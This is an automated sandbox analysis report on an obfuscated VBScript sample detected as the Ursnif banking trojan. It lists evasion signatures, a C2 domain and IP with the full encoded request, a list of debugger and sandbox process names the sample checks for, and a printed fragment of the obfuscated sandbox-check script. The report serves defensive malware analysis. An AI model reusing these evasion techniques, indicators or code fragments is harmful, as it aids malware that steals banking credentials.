Analysis Report JFCp0yRoUS1z.vbs

Overview

General Information

Sample Name: JFCp0yRoUS1z.vbs
Analysis ID: 323315
MD5: 87bb1fbc04d87eae50c84b5899fc1fea
SHA1: c7c63156ba13a0da650fbbff8742dd5847a78f9f
SHA256: 003e70adfcfd81e78857fa8225aabfb1c6f674acbe79f5c3b5cf9d2de0fb9968
Tags: vbs

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Sikkim.doc Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 12% Perma Link
Source: http://api10.laptok.at/favicon.ico Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for submitted file
Source: JFCp0yRoUS1z.vbs Virustotal: Detection: 10% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Sikkim.doc Joe Sandbox ML: detected
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 47.241.19.44 47.241.19.44
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/xZROIGY8JCl1/ywjLUw1zCQY/CInpxPtnNeEjWy/sCxEAQOPVrFlRIJzl2R_2/F16J3YU4Ef6GGYQv/L39jACZcpgRc_2F/h5cdjyHJqAOa8VNbzQ/Iu_2FxJUH/edMV_2BB69SXfoGEs_2F/pOd4KgfKEq9KuV9z0jl/V5CxGMrpIIjtI2PXMmxepQ/fV_2Boyejr8hz/TZn_2Fkp/ZyOboi3IOBo9b4_2F_2F4bd/o9DuqAZNsf/cfadSB_2BgabrnoN0/T2QDIcEXbYqy/rdeSuiFQIWM/R_0A_0DseSxMDU/0RvrcFZ6R5aCS318ZX_2B/SBFB1j02lp4gTd7K/7djJwH_2B_2F09X/Gw91DhRpoloUi/tC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml0.8.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe623d394,0x01d6c465</date><accdate>0xe623d394,0x01d6c465</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.8.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe623d394,0x01d6c465</date><accdate>0xe623d394,0x01d6c465</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.8.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe6289841,0x01d6c465</date><accdate>0xe6289841,0x01d6c465</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.8.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe6289841,0x01d6c465</date><accdate>0xe62afb08,0x01d6c465</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.8.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe62afb08,0x01d6c465</date><accdate>0xe62afb08,0x01d6c465</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.8.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe62afb08,0x01d6c465</date><accdate>0xe62afb08,0x01d6c465</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Nov 2020 17:34:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {100D246E-3059-11EB-90E4-ECF4BB862DED}.dat.8.dr String found in binary or memory: http://api10.laptok.at/api1/xZROIGY8JCl1/ywjLUw1zCQY/CInpxPtnNeEjWy/sCxEAQOPVrFlRIJzl2R_2/F16J3YU4Ef
Source: msapplication.xml.8.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.8.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.8.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.8.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.8.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.8.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.8.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.8.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.266705838.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266605622.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266740060.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266643602.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266763254.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266775938.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.270440345.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266682217.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266578434.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.266705838.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266605622.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266740060.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266643602.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266763254.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266775938.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.270440345.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266682217.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266578434.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Java / VBScript file with very long strings (likely obfuscated code)
Source: JFCp0yRoUS1z.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@4/22@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\JFCp0yRoUS1z.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: JFCp0yRoUS1z.vbs Virustotal: Detection: 10%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\JFCp0yRoUS1z.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6184 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6184 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(903436749)) > 0 And eTmTCKF = 0) ThenExit FunctionREM evaporate resplendent constitute poultice obtrude truffle Lakehurst Laidlaw Yeager Guardia. partook repository asterisk degrade bank tuck tragedian idetic Selfridge heterocyclic dovekie Po abrogate sternum military guardhouse desuetude345 Pakistan Grimm schematic Gino arrack grove gateway. broke Russia. 8714015 imbroglio. junta rupture Kristin temperance exchange guidepost ma tampon he NIMH nineteenth mastic steprelation hateful granulate shipman Lisbon Cambodia shun End IfSet jJwVxoRc = GetObject("winmgmts:\\.\root\cimv2")' dice Bruegel Ahmedabad horsemen vie usable, 1147005 molybdenite flaunt banshee Anselm Svetlana mirror Pl globulin propellant interior kumquat lightning blush exposit Knutsen Harmon Dorado. tag Cesare pinch catwalk afterlife, elongate clamshell fort crass hark Webb Fallopian steer guide cosmopolitan, writhe Ukraine Juneau, tinker structure Akers welsh Justinian law resemble bituminous isomorph dismal woodside forswore filthy bookkeep. Guinevere nettlesome exhaust suffuse nocturnal baronet Persephone. carload. Regina Errol freshwater Armco decrease aback mark mulligan vixen Rachel inhibition millstone greatcoat folksinging indices disastrous. 3249173 chalice build Vinci Goodrich exorcism sidetrack summitry sue hondo Juliet Leander desecrater thesaurus catnip shunt, passionate fascism labile, 1392482 engine Set hinterlandlItems = jJwVxoRc.ExecQuery("Select * from Win32_LogicalDisk")REM Freddie extensible, harken fascinate. Soc inlaid hogging. 482439 Marcus Melvin pond Brisbane susceptance insist jimmy cataract, 731201 Marjory decorum petulant arc diagnosis oilmen daybreak Clyde lay Telex Raphael uracil ricotta infinitum Juliet563 Colombia corralled shatter Alcestis Jane aliquot couturier treetop contributory inopportune Cochrane. veridic dilettante. duffel raspberry terbium ludicrous howsomever raise. sky Krieger dolce satire agone covert attack Ott courtroom Abe octahedral continue Delphi ordinate. Calgary baseboard, strain melodic Veda smudgy nautical572 bonze monstrosity. 7988574 eerie cachalot hypnosis, Quebec Emil mummy beatific Schulz Frigidaire chic scapula. 7470585 dessert corbel seventieth Sousa For Each sprue In hinterlandlItemstechnician = technician + Int(sprue.Size / (((100 - 38.0) + (16 + 1073743748.0)) - 2002.0))NextIf technician < (1 + ((66 - (1038 - 1036.0)) + (-5.0))) ThenoCqeIhNJREM McCracken uterine Ammerman slid silo ruse neuroanotomy lazy January vain Fanny hock. disparate Hitachi arrange collector whistle chipmunk camouflage chore, cornerstone felicitous oldy strode globulin392 Judaism cutaneous auk. 3661969 watchful drought malcontent shotbush, haulage throaty Madhya Perilla. opposable surname, vex927 very automatic hardbound crease MIT Vinson contagious Artemis maiden213. paraboloidal ache followeth vetch Ackerman congenital tetrahedral flirtation boric Tanzania bellmen pinch281 absentee soothsay Lenten Caleb douce sp

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Sikkim.doc Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Sikkim.doc Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.266705838.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266605622.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266740060.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266643602.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266763254.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266775938.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.270440345.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266682217.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266578434.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\jfcp0yrous1z.vbs Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Sikkim.doc Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4712 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: wscript.exe, 00000000.00000002.240347468.0000015EDBEF0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.240347468.0000015EDBEF0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.240347468.0000015EDBEF0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.240347468.0000015EDBEF0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Sikkim.doc.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\shirt.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.233514798.0000015ED8BF9000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.230001085.0000015ED8BFD000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.266705838.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266605622.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266740060.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266643602.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266763254.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266775938.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.270440345.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266682217.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266578434.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.266705838.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266605622.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266740060.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266643602.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266763254.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266775938.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.270440345.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266682217.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.266578434.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
